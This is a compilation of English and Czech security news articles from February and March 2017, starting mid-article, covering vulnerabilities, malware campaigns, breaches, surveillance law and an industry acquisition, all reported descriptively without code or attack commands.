V průběhu roku 2015 Eset zaznamenal, že zájem tvůrců ransomware, které cílí na Android, se přesunul z východní Evropy do USA a zaměřuje se na uživatele mobilních telefonů. Nicméně v loňském roce se ukázalo, že útočníci stále více míří i na asijský trh. „Určitě můžeme konstatovat, že se z ransomwaru na Androidu stala plnohodnotná globální hrozba,“ dodává Malcho.
WordPress Plugin With 1 Million Installs Has Critical Flaw
1.2.2017 securityweek Vulnerebility
Researchers discovered that NextGEN Gallery, a WordPress image gallery plugin that has more than 1 million active installs, is affected by a critical SQL injection vulnerability.
The flaw, identified by experts at web security firm Sucuri, allows a remote attacker to easily gain access to the targeted website’s database, including sensitive data such as passwords and secret keys.
The SQL injection vulnerability exists because the plugin’s developers have not properly sanitized user input. The issue was addressed last week with the release of version 2.1.79, but there is no mention of it in the changelog.
“This is quite a critical issue,” warned Sucuri vulnerability researcher Slavco Mihajloski. “If you’re using a vulnerable version of this plugin, update as soon as possible!”
According to Mihajloski, there are two different attack scenarios: one where the targeted site uses a NextGEN Basic TagCloud Gallery, and one where users are allowed to submit posts for review.
In the first attack scenario, the attacker can execute SQL queries by modifying the URL of the gallery. In the second scenario, an authenticated attacker can execute malicious code via shortcodes.
There are no reports about the vulnerability being exploited in the wild, but attacks could be launched in the upcoming period considering the large number of potentially vulnerable installations.
This is not the first time researchers have found a serious vulnerability in the NextGEN Gallery plugin. Last year, experts uncovered a remote code execution flaw.
A study conducted last year by RIPS Technologies showed that 8,800 plugins available in the official WordPress plugins directory had been affected by at least one vulnerability. Nearly 2,800 apps had high severity and 41 had critical flaws.
WordPress continues to be the most targeted content management system (CMS) and attackers have plenty of vulnerabilities to choose from when targeting WordPress websites.
A critical vulnerability patched in WordPress in January has been exploited against a large number of websites, including for defacements and remote code execution, despite WordPress developers not immediately disclosing its existence in an effort to give users enough time to patch their installations.
Popular Android Password Managers Expose Credentials
1.2.2017 securityweek Crime
Popular Android password managers are affected by serious vulnerabilities that can expose user credentials, researchers warned on Tuesday.
TeamSIK, a group of security experts from the Fraunhofer Institute for Secure Information Technology in Darmstadt, Germany, has analyzed nine of the most popular Android password managers available on Google Play.
The research focused on My Passwords from Erkan Molla, Informaticore’s Password Manager, LastPass, Keeper, F-Secure KEY, Dashlane Password Manager, Keepsafe, Avast Passwords, and 1Password, which have between 100,000 and 50 million installs.
While the apps are advertised as being highly secure, they each contained at least one low, medium or high severity vulnerability. TeamSIK has discovered a total of 26 issues, many of which were patched by vendors within one month after being reported. Only Avast has failed to patch some of the security holes.
“The overall results were extremely worrying and revealed that password manager applications, despite their claims, do not provide enough protection mechanisms for the stored passwords and credentials,” researchers said. “Instead, they abuse the users` confidence and expose them to high risks.”
According to the experts, some of the applications stored the master password in plain text, or exposed encryption keys in the code. In some cases, the users’ stored passwords could have been easily accessed and exfiltrated by a malicious application installed on the device.
Researchers also determined that some of the apps are vulnerable to data residue attacks and clipboard sniffing. Worryingly, many of the flaws they identified can be exploited without needing root permissions.
For example, one of the high severity flaws affected Informaticore’s Password Manager. While the app stored the master password in an encrypted form, the encryption key was found in the app’s code and it was the same for all installations. A similar flaw was also identified in LastPass.
The most popular of the apps, Keeper and Keepsafe, had two medium and one low-medium vulnerabilities, respectively.
TeamSIK’s analysis showed that built-in web browsers and features such as autofill can also introduce security risks.
“We found that, for example, auto-fill functions for applications could be abused to steal the stored secrets from the password manager application using ‘hidden phishing’ attacks. For a better support of auto-filling password forms in web pages, some of the applications provide their own web browsers. These browsers are an additional source of vulnerabilities, such as privacy leakage,” researchers explained.
Technical details have been made available for each of the patched vulnerabilities.
Cybercriminals Use Cracked Builder to Spawn Betabot Variants
1.3.2017 securityweek CyberCrime
Betabot, an old piece of malware that ensnares affected computers into a botnet, is now being distributed by attackers who managed to crack its builder, Sophos security researchers reveal.
The malware previously functioned as a banking information stealing Trojan, then became a password stealing malware, and recently began capitalizing on infected bots to distribute ransomware. Because some miscreants didn’t want to pay the malware’s creators to get a builder, they started using cracked builders to copy the original design without paying for it.
Sophos security researchers performed an in-depth analysis of Betabot version 1.7, which is said to be the most recent version. The malware’s command and control (C&C) server, they say in a report (PDF), features a fairly user-friendly interface which can appeal to cybercriminals who either lack technical knowledge or don’t want to create a botnet framework for themselves.
The Betabot malware package isn’t very expensive, being advertised on the black market for around $120. However, a cracked version of the builder has been circulating, allowing cybercriminals to use the malware without contacting the author and paying for the malicious softwar kit.
“As Betabot’s intended use is nefarious in nature, the existence of cracked versions of the builder indicates cybercriminals are not only targeting members of the unsuspecting public but are also engaged in activities related to hacking other malware to leverage the work of other malware authors for free. Although this is not unprecedented, the increased availability due to the utilization of a software crack often results in an increase in the malware family’s use by new parties,” the security researchers say.
Sophos’ researchers say that the Betabot authors did apply anti-piracy measures to their malware toolkit to ensure they receive payment when their creation is used by other cybercriminals. In fact, a feature called “proactive defense” packed in the malware is meant to prevent other competing bots or similar tools such as remote access Trojans from installing and potentially hijacking the botnet.
One of the used measures was the complexity involved in the method of encoding the configuration data inside the bot payload. This data includes, among other things, the URL of the C&C server and encryption keys used to encrypt and decrypt the data sent to the server. This configuration data is encrypted and saved in the bot and the complexity of the packaging method makes it difficult for researchers to analyze the threat and for other cybercriminals to encode their own configuration data.
The crack, researchers say, consists of a console-based builder application that has the compiled Betabot template code stored as a bytes array within the data section of the builder application itself. Users can specify custom configuration information that the crack then encrypts and inserts into the included template code at the appropriate position.
Next, the crack repacks the entire PE file in an attempt to further obfuscate the generated bot to avoid detection by antivirus software. The crack allows users to instruct the bot to connect to a specified C&C, and a single configuration data structure offers support for up to 16 individual servers. However, typical Betabot samples only specify one or two servers, researchers say.
Additionally, the cracked builder generates some pseudo random keys that are to be used for the communication with the server. These keys are then encrypted into the bot’s configuration along with the information provided by the user, and a payload executable that can be distributed is generated. The communication keys are also displayed on the screen, so that the user can configure their server to match them.
“The HC128 algorithm is included in the source code in the form of inline x86 assembly code intended for use with the Microsoft Visual Studio Compiler,” the researchers say. Comments in the cracked builder’s code suggests that the author of the crack couldn’t identify the encryption algorithm, and simply extracted it.
Sophos’ report also delivers a thorough analysis of the malware’s C&C server and capabilities, including the anti-piracy measures that the Betabot authors packed their creation with. Those interested in the technical details should have a look at the full report, available in PDF format.
“Although the Betabot family has been around for a while, it is still prevalent and used to spread other malware campaigns and harvest site login credentials. The availability of a crack and the simplicity of the C&C web portal make it attractive to cybercriminals to use without putting forth a lot of effort,” the researchers conclude.
Palo Alto Networks Acquires Breach Detection Startup LightCyber
1.3.2017 securityweek Safety
Palo Alto Networks on Tuesday announced that it has acquired breach detection firm LightCyber for $105 million in cash.
The network security company said that LightCyber’s machine learning, behavioral analytics platform will be integrated into Palo Alto’s Next-Generation Security Platform to help customers better detect breaches throughout the entire attack lifecycle.
LightCyber has raised more than $32 million in funding since being founded in 2011.
Palo Alto Networks LogoLightCyber’s platform doesn’t look at a specific packet or field to detect possible malicious activity, but instead detects attacks by identifying suspicious behavior inside the network.
“We look at the behavior. This means that every file access and every protocol could be used as an attack indication - even were it alright under a different context,” Gonen Fink, CEO of LightCyber, explained to SecurityWeek back in March 2013. “What we do is model each computer and user separately, and maintain those models over time. Everything we do is based on history we gather from the network.”
"This technology will complement the existing automated threat prevention capabilities of our platform to help organizations not only improve but also scale their security protections to prevent cyber breaches,” Mark McLaughlin, chairman and CEO of Palo Alto Networks, said in a statement.
The technology integration is expected to be completed by the end of the calendar year, Palo Alto said.
In a 2013 interview with SecurityWeek, LightCyber's Fink told us that his favorite startup (other than his own) was a company called Cyvera. Ironically, Palo Alto Networks also acquired that company in early 2014.
In addition to announcing the acquisition, Palo Alto on Tuesday announced that total revenue for the fiscal second quarter 2017 came in at $422.6 million, compared with total revenue of $334.7 million for the fiscal second quarter 20106—a 26 percent increase year over year. These figures fell short of Wall Street expectations, sparking shares of the company (NYSE:PANW) to plummet more than 20 percent in after-hours trading.
"While fiscal second quarter revenue of $423 million was yet another record for the company, we were disappointed that we came in below top-line expectations due to some execution challenges, which we are moving quickly to address," McLaughlin said.
Hackers Breached Non-Classified System at Singapore's Ministry of Defence
1.2.2017 securityweek Hacking
Singapore’s Ministry of Defence (MINDEF) on Tuesday said that it hackers managed to breach a military system that handles non-classified information and access personal data, including NRIC numbers, telephone numbers, and dates of birth of roughly 850 servicemen and employees.
The data was stolen from the Ministry’s I-net system (I-net), which provides Internet access to national servicemen and employees for their personal use and those using dedicated I-net computer terminals in MINDEF and Singapore Armed Forces (SAF) camps and premises.
No classified military information is stored on I-net, the Ministry said, noting that classified matters in MINDEF/SAF use a different computer system with "more stringent security features" that are not connected to the Internet.
In June 2016, Singapore said it would cut off Internet access for government work stations within a year for security reasons, a move that surprised many.
After discovering the incident, MINDEF said the affected server was disconnected from I-net.
“Immediate and detailed forensic investigations were conducted on the entire I-net to determine the extent of the breach,” the Ministry said. “As a precaution even though no breach had been detected, all other computer systems within MINDEF/SAF are also being investigated.”
“The real purpose may have been to gain access to official secrets, but this was prevented by the physical separation of I-net from our internal systems,” a statement added.
MINDEF said the Cyber Security Agency and the Government Technology Agency of Singapore have been notified.
In August 2014, Singapore officials announced new measures to strengthen cyber security following attacks on a section of the prime minister's website, as well the website of the presidential residence.
Singapore is the home city for SecurityWeek’s 2017 Singapore ICS Cyber Security Conference, an event dedicated to serving critical infrastructure and industrial internet stakeholders in the APAC region. With organizational support from Singapore’s Cyber Security Agency, the event will take place April 25-27, 2017 at the Fairmont Singapore.
Linuxové distribuce obsahují vážnou chybu. Její odhalení trvalo 11 let
28.2.2017 Živě.cz Zranitelnosti
Bezpečnostní expert Googlu Andrey Konovalov odhalil v jádru Linuxu kritickou bezpečnostní chybu, která by útočníkům umožnila získat administrátorské (root) oprávnění. V systémech byla přítomna minimálně jedenáct let. Na hrozbu upozornil Bleeping Computer.
Zranitelnost označena jako CVE-2017-6074 byla potvrzena v linuxových jádrech od verze 2.6.18, která byla uvolněna ještě v září 2006. Vážné problémy způsobila nevhodná implementace protokolu Datagram Congestion Control Protocol (DCCP) sloužícího především na ochranu před přetížením datové sítě.
Konovalov totiž našel způsob, kterým může zneužít protokol DCCP pro vytvoření takzvané double free chyby. Jde o bezpečnostní hrozbu, ke které dochází v případě, kdy aplikace uvolní stejnou adresu v paměti dvakrát. V cílených případech umožňuje tato chyba spuštění škodlivého kódu s nejvyššími oprávněními v jádru systému
Chybu nelze zneužít prostřednictvím vzdáleného přístupu přes internet. Experti se však shodují, že může být kombinována s jinými zranitelnostmi, což může v konečném důsledku otevřít hackerům dveře do cílového systému.
Už je opraveno, stahujte záplaty
Na hrozbu byli řádně upozorněni všichni vývojáři jednotlivých linuxových distribucí. Mezi ohrožená linuxová jádra patří ta, která byla kompilovaná s funkcí CONFIG_IP_DCCP.
Vývojáři Red Hat Linuxu ve svém prohlášení uvedli, že systémy Red Hat Enterprise Linux 5, 6, 7 a Red Hat Enterprise MRG 2 obsahují uvedenou chybu. Odpovídající záplaty však byly průběžně vytvořeny a již jsou dostupné ke stažení.
Podobná situace vládne i v případě distribucí Debian. Bezpečnostní aktualizace jsou dostupné pro Debian 7 Wheezy a Debian 8 Jessie. Záplaty jsou rovněž k dispozici i pro distribuci Ubuntu 12.04 LTS, Ubuntu 14.04 LTS, Ubuntu 16.04 LTS a Ubuntu 16.10.
Ubuntu má novou oficiální odnož Budgie, zaujmout chce hlavně designem
Z distribucí SUSE Linux se chyba týká pouze verze SUSE Linux Enterprise Server 10, přičemž jsou aktualizace dostupné pouze pro zákazníky programu LTSS (Long Term Service Pack Support). Jádra systémů SUSE Linux Enterprise Server 11 SP 1 až 4 a SUSE Linux Enterprise Server 12 SP 1 až 2 nejsou sestaveny s podporou protokolu DCCP.
Funkční prototyp škodlivého kódu bude zveřejněn v průběhu několika dnů. Uživatelé tak mají pouze omezenou dobu pro nezbytnou aktualizaci svých systémů.
Čtenářům proto doporučujeme, aby zkontrolovali dostupnost aktualizací pro svoji linuxovou distribuci. V případě, že je váš systém zranitelný a oficiální záplata není zveřejněna, pomůže jednoduchý skript , kterým zakážete spouštění DCCP protokolu.
Kybernetické útoky proti Rakousku prováděl Turek žijící v USA
28.2.2017 Novinky/Bezpečnost Kyber
Za nedávnými kybernetickými útoky proti klíčovým institucím v Rakousku stojí turecký nacionalista žijící v USA. S odvoláním na rakouskou rozvědku o tom informoval server listu Der Kurier. Podle deníku se ale asi nepodaří zjistit, zda Arslan A. jednal na vlastní pěst, nebo ve spolupráci s tureckou tajnou službou MIT.
V Rakousku se v posledních měsících stalo terčem hackerů letiště, ministerstva, centrální banka a parlament. K útokům se přihlásila anonymní turecká skupina, která jako motiv uvedla "k Turecku nepřátelské" chování Rakouska. Vídeň například žádala zmrazení přístupových jednání mezi Evropskou unií a Ankarou.
Hlavní podezřelý, identifikovaný jako Arslan A., žije s bratrem a bratrancem v bungalovu ve městě Bowling Green ve východoamerickém státě Kentucky. Úřady Spojených států se mužem již zabývají a vyšetřuje jej také rakouská justice.
Útočil i v jiných zemích
Arslan A. napadl kromě cílů v Rakousku také servery v Izraeli, Iráku a v samotných USA. Jeho terčem se stal i server turecké Strany kurdských pracujících (PKK), která vede ozbrojený boj za autonomní Kurdistán. Pro své útoky využíval síť 600 počítačů nakažených škodlivým programem ve 150 zemích světa.
Série útoků začala loni v září, kdy se tehdy neznámí hackeři pokusili ochromit server vídeňského letiště. To se však dokázalo ubránit. Několik dní poté byl napaden server centrální banky.
Na konci listopadu se terčem stalo ministerstvo zahraničí, které ale útok také odrazilo. O dva dny později se hackeři zaměřili na ministerstvo obrany, přičemž dočasně vyřadili web rakouské armády. Jako poslední čelil letos 5. února napadení parlament.
E-maily baví kyberzločince i po 30 letech. Podceňovat bezpečnost se nevyplácí
28.2.2017 Novinky/Bezpečnost Spam
E-mailovou komunikaci využívají lidé po celém světě již více než tři dekády. A i přes nástup sociálních sítí patří právě e-mail mezi jeden z nejpoužívanějších komunikačních nástrojů. Právě proto se na něj velmi často zaměřují počítačoví piráti. Podceňovat zabezpečení svých elektronických poštovních schránek se tak nemusí ani trochu vyplatit.
Na světě je podle dat analytické společnosti Radicati Group více než 2,6 miliardy uživatelů elektronických poštovních schránek.
Jen v loňském roce proteklo celosvětovou počítačovou sítí každý den v průměru 215 miliard e-mailů. A toto číslo neustále roste. Například v lednu se totiž denní várka e-mailů zvýšila v průměru až na 269 miliard.
S ohledem na vysokou popularitu této komunikační metody je vcelku pochopitelné, že se na ni velmi často soustředí i počítačoví piráti. Ti totiž pravidelně cílí na nejpoužívanější služby, neboť díky tomu zvyšují šanci na úspěšný útok.
Nejčastěji rozesílají různé podvodné zprávy, ve kterých se vydávají za zástupce různých společností nebo organizací. Lákají například na půjčky na poslední chvíli či na slevy elektroniky a šperků. V kurzu jsou také nejrůznější slevové kupóny. Odkaz v e-mailu často směřuje na podvodný web, kde se objevuje možnost získání kupónu po registraci. Místo něj ale zpravidla uživatel vyzradí své přihlašovací údaje, případně si stáhne do počítače nějaký škodlivý virus.
Varováním může být lámaná čeština, podivná příloha nebo zkomolená adresa známé webové stránky
David Finger, produktový manažer Seznam.cz Email
Právě před podobnými nabídkami by měli být ve svých poštovních schránkách uživatelé velmi obezřetní. „Podvodný web registrace využije a začne do schránky pravidelně posílat e-maily. Ty vypadají obvykle nevinně. Tváří se třeba jako gratulace k neexistující výhře nebo nabídka další hry či zboží,“ uvedl David Finger, produktový manažer služby Seznam.cz Email.
„Varováním těchto e-mailů může být lámaná čeština, odkaz, na který je nutno kliknout pro více informací, podivná příloha nebo zkomolená adresa známé webové stránky. Zobrazením si nevinného obrázku v příloze nebo webové stránky přitom může uživatel snadno do počítače nahrát vir. Ten buď poškodí počítač, nebo v horším případě na prohlížeč nainstaluje doplněk, který bude podvodníkům odesílat citlivé údaje, včetně zadávaných hesel do bankovnictví nebo dalších služeb,“ konstatoval Finger.
Spam existoval dříve než internet
Dávno před zrodem internetu dnešní podoby proběhla aféra, kterou lze označit za zrod nevyžádaných zpráv – spamu. V květnu 1978 odeslal obchodník Gary Thuerk příjemcům pošty v síti Arpanet zprávu s pozvánkou na promoakci nového počítače. Nevyžádaná pošta byla vlastně prvním spamem, ačkoli tento název se začal používat až o patnáct let později.
Teprve v roce 1993 přišel administrátor sítě Usenet Joel Furr s pojmem spam – nevyžádaná pošta. Furr se inspiroval svým oblíbeným seriálem Monty Python a skečem o mase v konzervách, na kterých si skupina Vikingů pochutnávala a opěvala ho: „Spam. Spam. Spam. Spam. Spam.“ Spam je obchodní značka konzervy s vepřovou šunkou. Název vznikl zkrácením slov sp(ice) a (h)am – koření a šunka.
Heslo nepodceňovat
Finger zároveň upozornil, že nebezpečí číhá na internetu také na uživatele, kteří podceňují zabezpečení svých schránek. Tedy jinými slovy používají velmi slabé heslo. „Heslo by nemělo být snadno uhodnutelné. Jméno čtyřnohého mazlíčka nebo »heslo123« totiž nejsou hesla,“ varoval produktový manažer.
Bezpečné heslo by mělo mít minimálně šest znaků a mělo by obsahovat číslice a ideálně velká i malá písmena. Heslo by naopak v žádném případě nemělo být tvořeno jménem uživatele, jednoduchými slovy (jako například „heslo”) nebo pouhou posloupností číslic.
Právě u e-mailu by přitom mělo být heslo nejsilnější a v ideálním případě i naprosto unikátní. Prostřednictvím poštovní schránky se totiž uživatelé často registrují i na další internetové služby. Pokud tedy získá počítačový pirát heslo k e-mailu, zpravidla mu nečiní žádný problém dostat se například na nejrůznější sociální sítě, kde může sledovat probíhající komunikaci nebo prostě jen ukrást identitu své oběti.
Sociální sítě i diskusní fóra
I když jsou rady ohledně používání hesel celé řadě uživatelů dobře známé, drtivá většina lidí stále ještě význam hesla podceňuje. A to neplatí jen o e-mailových schránkách, ale také o dalších službách na internetu, jako jsou například různé sociální sítě a diskusní fóra. Dokládá to žebříček nejpoužívanějších hesel, který loni sestavil server Leaked Source.
Absolutním vítězem je číselná kombinace 123456. Tu by přitom lidé podle bezpečnostních expertů neměli za žádných okolností k zabezpečení jakéhokoliv účtu používat, protože útočníci ji s ohledem na její rozšířenost zkouší při napadení účtů zpravidla jako první možnost.
Nejpoužívanější hesla na internetu
Pořadí Heslo
1 123456
2 123456789
3 1234
4 12345
5 password
6 12345678
7 1234567
8 123123
9 111111
10 000000
11 qwerty
12 bearshare
13 1111
14 1234567890
15 0000
TLS Bug in Blue Coat Proxy Breaks Chromebooks, PCs
28.2.2017 securityweek Vulnerebility
Products from Symantec-owned Blue Coat and likely other vendors can cause serious problems for devices running the Chrome web browser or Chrome OS due to poor implementation of the TLS 1.3 protocol.
Google warned last week that the use of Blue Coat proxies causes connection problems when Chrome 56 or Chrome OS 56 attempt to connect via TLS 1.3. The tech giant believes the issue affects products running version 6.5 of the Blue Coat SGOS operating system.
An employee of Montgomery County Public Schools in Maryland reported that thousands of the organization’s Chromebooks and PCs had broken down due to the bug. The affected devices had automatically updated to Chrome OS 56, respectively Chrome 56, which introduce support for TLS 1.3.
The employee said the organization’s Chromebooks are “stuck in a state of flickering between a login screen and a ‘Network not available’ screen. Occasionally, you can see a SSL_HANDSHAKE_ERROR briefly at the login screen before switching back to the ‘Network not available’ screen.”
Other major education organizations are affected as well, likely because SSL/TLS inspection is common in this sector, Google said.
The company has provided some workarounds and released a Chrome update that disables TLS 1.3. A future version of the web browser will re-enabled TLS 1.3; hopefully, firewall and proxy vendors will address the issue until then.
According to Google, Blue Coat was informed of TLS 1.3 several months ago, but the company failed to properly test its software. SecurityWeek has reached out to Symantec for comment and will update this article if the company responds.
A study conducted recently by researchers from Mozilla, Google, CloudFlare and various universities showed that many antiviruses and network appliances that intercept TLS connections for visibility into encrypted traffic weaken security and introduce vulnerabilities.
The study found that only Blue Coat’s ProxySG product maintained an optimal TLS connection, but those tests were conducted on TLS 1.2.
TLS 1.3 is still under development, but a final version is expected soon. The new version of the protocol improves speed and eliminates some of the features that have been leveraged in the TLS attacks disclosed over the past years.
Windows 10 Option to Block Installation of Win32 Apps
28.2.2017 securityweek Safety
Windows 10 could soon allow users to block the installation of applications coming from other sources than the Microsoft Store, a feature that would likely help prevent the installation of malware.
The feature, which would essentially prevent users from installing Win32 applications, is said to be currently tested as part of the latest build to have been pushed to users in the Insider Preview program (which is Windows 10 build 15042).
Win32 is the core set of application programming interfaces (APIs) available in the Microsoft Windows operating systems and is often referred to as the Windows API. In addition to Win32 apps, however, Windows 10 users can also install software built using Microsoft’s Universal Windows Platform, or UWP.
This new platform is the framework for applications that support not only Windows 10 computers, but also other devices running under the platform, such as Xbox One, HoloLens, and phones. Microsoft Store, the app portal accessible from all these devices, only accepts UWP applications, and the tech company even released a converter to help developers port Win32 apps to UWP.
With millions of Win32 applications available out there, it might take a while before all developers switch to the new framework, especially if users aren’t in a hurry to embrace UWP applications.
What the newly observed change does is to let users block Win32 apps from being installed, by selecting an option to “Allow apps from the Store only” from the Windows 10’s Apps & Features settings screen. According to Vitor Mikaelson, even when this option is selected, already installed Win32 apps will be allowed to run normally.
The option is expected to become available in all Windows 10 editions once the Creators Update arrives in April, which will also allow enterprise users to benefit from it. Basically, admins will be able to install necessary apps and then turn the feature on to keep unwanted applications away. This option will essentially prevent malware from being installed on Windows 10 devices, either with or without user’s consent, unless it is being distributed via Microsoft Store.
The upcoming feature will also offer options such as to allow applications from anywhere without warning, or to prefer those from the Microsoft Store but still allow those from other sources (which will trigger a prompt to inform users that they are installing applications that are not from the Windows Store).
Adwind RAT Campaign Hits Organizations Worldwide: Kaspersky
28.2.2017 securityweek Virus
A recently observed massive campaign using the Adwind Remote Access Tool (RAT) has hit over 1,500 organizations in over 100 countries and territories, a recent report from Kaspersky Lab warns.
The attacks were spread across industries, Kaspersky says, though the retail and distribution sector was hit the most (20.1%), followed by architecture and construction (9.5%), shipping and logistics (5.5%), insurance and legal services (5%), and consulting (5%).
The Adwind backdoor has been around for several years, and Kaspersky said last year that it managed to infect over 443,000 users between 2013 and 2016. Also known as AlienSpy, Frutas, Unrecom, Sockrat and jRAT, the malware has been associated with numerous attacks, with the AlienSpy variant discontinued in April 2015 after a report detailing it was published.
The threat is openly distributed in the form of a paid service, where any customer can use the malicious program by paying a fee. According to Kaspersky, this is the main feature that distinguishes the Adwind RAT from other commercial malware.
Written in Java, the malware isn’t restricted on a single platform, but can be used to target Windows, Linux, and macOS, as well as other platforms that run Java, including Android. With the help of this threat, cybercriminals can log keystrokes, steal passwords and other data from web forms, capture screenshots, record audio and video, transfer files, and steal a great deal of confidential information as well.
As part of the newly detailed campaign, the RAT is being distributed via emails supposedly coming from the HSBC Advising Service (from the mail.hsbcnet.hsbc.com domain), purporting that payment advice has been included in an attachment. Although detailed only now, the activity of this email domain has been tracked back to 2013, Kaspersky Lab researchers say.
Once the victim opens the attachment, however, a malware sample is installed on the machine. The attachment comes in the form of a .ZIP file that includes a JAR inside. When the user opens it, the malware self-installs, after which it attempts to establish communication with the command and control (C&C) server.
Once a computer has been compromised with the Adwind backdoor, the malware’s operators have virtually complete control over it. This also allows them to immediately start stealing confidential information from the machine.
While analyzing the threat, Kaspersky has established that more than 40% of the targeted users live in ten countries: Malaysia, UK, Germany, Lebanon, Turkey, Hong Kong, Kazakhstan, United Arab Emirates, Mexico, and Russia.
Kaspersky Lab researchers also suggest that the cybercriminals behind these attacks might be using industry-specific mailing list to target their attacks, considering the fact that a high proportion of their victims are businesses. “Considering the number of detections, they were focused on attack scale and outreach, rather than on sophisticated technology,” the researchers also say.
"Gamaredon" Group Uses Custom Malware in Ukraine Attacks
28.2.2017 securityweek Virus
A Russia-linked threat group tracked as “Gamaredon” has been using custom-developed malware in attacks aimed at Ukraine, Palo Alto Networks reported on Monday.
The group has been active since at least mid-2013, but its activities were first detailed in April 2015 by LookingGlass. The security firm’s analysis focused on Operation Armageddon, a cyber espionage campaign targeting Ukrainian government, military and law enforcement officials.
The Security Service of Ukraine (SBU) issued a statement at the time attributing the attacks to branches of Russia's Federal Security Service (FSB). Furthermore, evidence found by researchers suggested that the malware used by the threat actor had been built on a Russian operating system.
In the attacks analyzed by LookingGlass in 2015, the Gamaredon group used spear-phishing emails to deliver common remote access tools (RATs), such as Remote Manipulator System (RMS) and UltraVNC.
According to Palo Alto Networks, Gamaredon has started using new, custom-built malware instead of the widely available RATs. However, it’s unclear if the latest attacks are also part of Operation Armageddon or if they represent a new campaign.
The new pieces of malware used by the group are capable of downloading and executing additional payloads, scanning infected systems for specific files, capturing screenshots, and executing remote commands. While the actor’s older tools were easily identified by antimalware products (e.g. TROJ_GAMAREDON, Trojan.Gamaredon), its new creations often go undetected or unrecognized.
“We believe this is likely due to the modular nature of the malware, the malware’s heavy use of batch scripts, and the abuse of legitimate applications and tools (such as wget) for malicious purposes,” said Palo Alto Networks researchers.
One of the custom backdoors used by Gamaredon is Pteranodon, which can capture screenshots, download and execute files, and execute commands on the system.
While Gamaredon has started using new malware, it still relies on self-extracting archives (SFX) and much of the same infrastructure as when its activities were first analyzed.
Russia-linked threat groups have been blamed for several campaigns targeting Ukrainian organizations, including damaging attacks on the country’s energy sector.
Prisons and Courts Bill allows mobile networks to deploy IMSI catchers outside of prisons
28.2.2017 securityaffairs Mobil
The new UK Prisons and Courts Bill will let mobile networks to deploy IMSI catchers outside of prisons to snoop on mobile phone users.
The Prisons and Courts Bill, introduced to Parliament last week, will let mobile networks to deploy IMSI catchers outside of prisons to snoop on mobile phone users.
The IMSI catchers are surveillance equipment used for intercepting mobile phone traffic, calls, tracking movements of mobile phone users block phones from operating.
An IMSI catcher runs a Man in the Middle (MITM) attack acting as a bogus mobile cell tower that sits between the target mobile phone and the service provider’s real towers.
The deployment of IMSI catchers aims to prevent, detect or investigate the use of mobile phones in prisons.
The measure is a novelty because in the past the use of IMSI catchers under the legal provisions in the Prisons (Interference with Wireless Telegraphy) Act 2012 was restricted within prison walls.
The decision represents a threat to the privacy of citizens, privacy advocates pointed out the IMSI catchers allow a dragnet surveillance.
The Clause 21 of the bill, along with its schedule 2, will amend the Prisons (Interference with Wireless Telegraphy) Act 2012 to allow the Justice Secretary to authorize “interference with wireless telegraphy”.
“The Secretary of State may authorise a public communications provider to
interfere with wireless telegraphy.
An interference with wireless telegraphy authorised under subsection may be carried out only for the purpose
of preventing the use within a relevant institution in England and Wales of an item specified in subsection,
or detecting or investigating the use within a relevant institution in England and Wales of such an item.” reads the Clause 21.
The measure will allow detecting illegal use of mobile devices by prisoners illicitly communicating with people outside.
In October 2016, it was publicly disclosed the news that UK police has purchased police this mobile phone snooping technology to track suspects’ devices and intercept their communications as part of their investigations.
According to the Bristol Cable the UK police is using the Stingray equipment for its operations. The law enforcement has reportedly purchased “covert communications data capture” equipment (CCDC) from a UK firm, the Cellxion.
The Metropolitan Police has been operating IMSI catchers since a long time, it also used a surveillance aircraft equipped with the surveillance equipment.
“The Metropolitan Police in particular has been operating IMSI catchers, along with a covert air wing run through a front company registered to an anonymous mailbox in South London, since at least 2011.” states the ElReg. “The Met’s surveillance aircraft, a twin-engined Cessna Caravan F406 with the registration G-BVJT, is a familiar sight to Londoners. It is thought the aircraft’s surveillance fit includes IMSI catchers and live mobile phone tracking and eavesdropping capability.”
Boeing notified 36,000 employees following an accidental data leak
28.2.2017 securityaffairs Incindent
A Boeing employee inadvertently leaked the personal information of 36,000 co-workers late last year, the aerospace giant is notifying them the incident.
The aerospace giant Boeing notifies 36,000 employees following an accidental data leak. A company employee inadvertently leaked the personal information of his co-workers late last year, the man sent by email a company spreadsheet to his spouse who didn’t work at the company.
The file shared by the man contained sensitive, personally identifiable information of 36,000 Boeing employees, including names, places of birth, BEMSID, or employee ID numbers, and accounting department codes.
The data leak was publicly disclosed earlier February after the Boeing’s Deputy Chief Privacy Officer Marie Olson notified the security breach to the Attorney General for the state of Washington Bob Ferguson.
Boeing
According to Olson, the spreadsheet also included “hidden columns” containing social security numbers and dates of birth.
According to the breach notification, the incident occurred on Nov. 21, 2016, it was discovered on Jan. 9, but Boeing notified the security breach starting from Feb. 8.
In response to the breach, Boeing has destroyed copies of the spreadsheet from both the Boeing employee’s computer and his spouse’s PC.
“Both the employee and his spouse have confirmed to us that they have not distributed or used any of the information,” reads the Boeing breach notification.
Boeing experts don’t believe the data have been used inappropriately, anyway, it is offering employees two years access to a free identity theft protection service.
In order to avoid similar incidents in the near future, the company plans to require additional training to its employees on how to manage sensitive data and it to implement additional controls to sensitive information.
Unfortunately, this isn’t the first time that the company suffered similar incidents, in several cases, laptops containing sensitive data were stolen. In December 2006, thieves have stolen a laptop containing data related to 382,000 employees.
A flaw in ESET Endpoint Antivirus allows to hack Apple Macs, patch it now
28.2.2017 securityaffairs Vulnerebility
A flaw in ESET Endpoint Antivirus is exploitable to get remote root execution on Apple Mac systems via Man-In-The-Middle (MiTM) attacks.
According to the security advisory published by Google Security Team’s Jason Geffner and Jan Bee on Seclists, it is possible to get remote root execution on Apple Mac systems via Man-In-The-Middle (MiTM) attacks. The attackers can get root-level remote code execution on a Mac by intercepting the ESET antivirus package’s connection to company backend servers. The attack is possible due to the presence of a buffer overflow vulnerability in the XML library tracked as CVE-2016-0718.
“Vulnerable versions of ESET Endpoint Antivirus 6 are statically linked with an outdated XML parsing library and do not perform proper server authentication, allowing for remote unauthenticated attackers to perform arbitrary code execution as root on vulnerable clients.” reads the advisory.
According to the experts, the attack is possible because the esets_daemon uses an old version of POCO’s XML parser library that is affected by the buffer overflow vulnerability.
The researchers discovered that the flawed library also handles license activation with a request to the following static address:
https://edf.eset.com/edf.
When the ESET Endpoint Antivirus tries to activate the license, the esets_daemon sends a request to the above address, but it doesn’t validate the web server’s certificate opening the door to a man-in-the-middle attack.
An attacker can intercept the request and send to the ESET Endpoint Antivirus a self-signed HTTPS certificate, then the esets_daemon service
parses the response as an XML document.
In this phase, the attacker can pass a specifically XML document that can trigger the CVE-2016-0718 to achieve arbitrary code execution
as root.
